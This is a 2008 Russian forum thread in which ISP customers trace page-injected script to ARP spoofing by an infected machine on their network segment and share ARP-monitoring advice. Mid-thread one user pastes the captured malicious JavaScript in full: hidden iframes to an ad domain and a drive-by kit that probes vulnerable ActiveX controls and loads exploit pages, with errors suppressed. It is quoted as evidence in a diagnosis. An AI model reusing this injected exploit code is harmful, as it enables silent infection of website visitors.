Форум портала Metropolis

Короче завелся вирус, проблема с браузерами: IE7, Opera 9.27, FireFox 3.0.3!!!
2 раза переустанавливал винду
Щас переустановил опять и установил Касперского 8! Вирус он вроде видит но не удаляет, каждый раз выскакивает сообщение, одно и тоже к FireFox и опере
Да и во всех браузерах все время происходит искождение шрифтов и масштабов!

Попробуй просканировать http://cureit.ru/
Меня он несколько раз выручал

быстрая проверка ничего не нашла(((( щас делаю полную!
вот отчет с касперского

Если быть точным, то это не вирус, а spyware, попробуй adaware, если ничего не помогло.

антивирус тот что дал уважаемый OLEGA вроде помог, он нашел какой-то *.dll файл и удалил его))

Это ARP-spoofing (http://xgu.ru/wiki/ARP-spoofing). Проблема в зараженном компьютере, находящемся с тобой в одном сегменте, который подменяет ARP-записи и начинает гнать весь трафик через себя, вставляяя во все страницы этот код.

Выход: звонить в техподдержку и назвать MAC-адрес этого компа или прописать MAC-адрес настоящего шлюза у себя статически, но в этом случае при смене оборудования у провайдера, инет перестанет работать, нужно будет прописывать заново новые адреса.

Сам столкнулся с этой проблемой: http://forum.interzet.ru/index.php?showtopic=38381

ну я скачал MD Arp Monitor))) и чего дальше то делать?

Прям на этой странице нажать Ctrl+U (если в «Опере»).

Если первая строчка не начинается со <script, запускаешь MD ARP Monitor. Там Сервис—Настройки и ставишь галочки как на приложенном скриншоте. Если пользуешься «Вистой», то в автозагрузку придётся вручную добавить.

Когда появится окно с текстом типа «Подмена адреса!», звонишь в ТП.

все сделал как ты описал)
Отправлено: 08 Октября 2008, 16:45

---

короче все опять началось!!!!
в исходном коде опять появилось:
<script language="javascript" SRC="http://sun.ads2008.info/vip.js"></script>
MD ARP Monitor ничего не писал, типо "подмена адреса" и т.п....

Открываешь командную строку (Win+R — cmd). Пишешь arp -a, звонишь в техподдержку.

Лучше сюда запостить http://support.anthill.ru/forum/index.php?topic=4848.0

да никто мой айпи и интернет не ворует!!!!!!
я незнаю даже что это, и как это убрать вообще!!
может фаервол поставить?

была такая фигня.... решил установкой адвара....

ссылку в студию)))

http://www.adaware.ru/download.htm

я теперь понял почему тебя не любят на форуме :D
скачал прогу, а она на 5 процентах обновления выдает ошибку...((

что значит не любят?? Я те на офф сайт дал ссылку... проблема с их программами не моя вина...

вроде чето нашло, и без обновления, удалил!!!!!!! щас проверим))
Отправлено: 08 Октября 2008, 20:08

---

непомогло...

И не поможет.

Потому что на твоём компьютере нет вируса.

ну тогда не знаю даже что делать...
все что ты советовал сделал! Арп Монитор включён, но никаких сообщений о подмене адреса нету(
Отправлено: 08-10-2008 | 20:37:11

---

20:59:13 Подмена адреса! 10.224.108.1 00-50-fc-96-3b-54 (10.224.108.1 00-12-cf-4d-22-42)eXtractor свершилось :D что теперь делать?

i	Зря здесь спалил, негодяй может зашухериться, но теперь уже ничего не поделаешь. Foxeed

Теперь 363-17-17.

document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"хттп://ban.ads2008.info/ads.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")
Отправлено: 08-10-2008 | 22:38:13

---

<script>
window.status="НкіЙ";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=sina.htm></iframe>");}}
try{var n;
var hl=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=re10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=re11.htm></iframe>");
}
test();
</script>
<iframe width=20 height=0 src=flash.htm></iframe>
<iframe width=20 height=0 src=office.htm></iframe>
<script language="javascript" type="text/javascript" src="хттп://js.users.51.la/2192323.js"></script>
<noscript><a href="хттп://www.51.la/?2192323" target="_blank"><img alt="我要啦免费统计" src="хттп://img.users.51.la/2192323.asp" style="border:none" /></a></noscript>

!	Что это? HTML-тэги и скрипты на форуме режутся или ты не знал? Потрудись объяснить или премод надолго за спам. Foxeed

Отправлено: 08-10-2008 | 22:44:41

---

мдя... Тёма прав... вначале я прав потом Тёма... не суть...
была ссылка на инзетовский портал
на инзетовском портале просили выложить текст скрипта... я думал антовским тоже надо.. вот вам текст скрипта.. после ____________
что означает продолжение идёт хттп://ban.ads2008.info/ads.htm исходник.
воть) и ещё убрал кликабельность потому что... ^__^

ежели чё гомен насай

Тёма всегда прав.

P.S. Порежьте к чертям исходники, а то кто нить умный еще замутить с ними ченить нехорошее. Идея ведь видна

2 Foxeed
пазязя сотри этот пост и исправь в посте выше
гомен носай
а то ошибся и глазки режет (:
____________________________
имел в виду оставить 21пост
и удалить 23пост

Я думаю, он даже не подозревает.

ога.. нигодяй из латвии спалил форум анта -_-"

Ну мало ли, ты ведь не знаешь, кто с тобой в одном сегменте адрес занимает?

PS: Dessmand, я немного не понял, стереть пост со скриптом, а что исправить-то?

Хм, моя подсеть... Мой шлюз... У меня эта ботва уже месяц. А мне лень -_-

у меня тоже уже около месяца, но сегодня я не выдержал!^^
и кстати у меня её щас нету, т.к. этот юзер офлайн наверное, а как у вас как дела?

То же самое. Все тихо. У меня это обычно проявляется (по крайней мере, я замечаю), когда в контакте портятся css из-за модификации веб-страниц. Плагин к 3-ему Фоксу, производящий их верификацию, бьет тревогу. Следом за ним НОД.
Да и выглядит это не очень эстетично.
Только сейчас прочитал про интересную arp-программулину. Поставил. Совместными усилиями вычислим! :)
Отправлено: 09 Октября 2008, 01:05

---

Подмена адреса! 10.224.108.1 00-17-9a-b9-c8-74 (10.224.108.1 00-12-cf-4d-22-42)Та же тема.

Та же беда 18:55:04 Подмена адреса! 10.224.33.1 00-30-84-0f-3e-dc (10.224.33.1 00-12-cf-52-96-04)

2zero:
матчасть бы вам подучить...о методах распространения вирей да и вобще о них самих (http://ru.wikipedia.org/wiki/Компьютерный_вирус)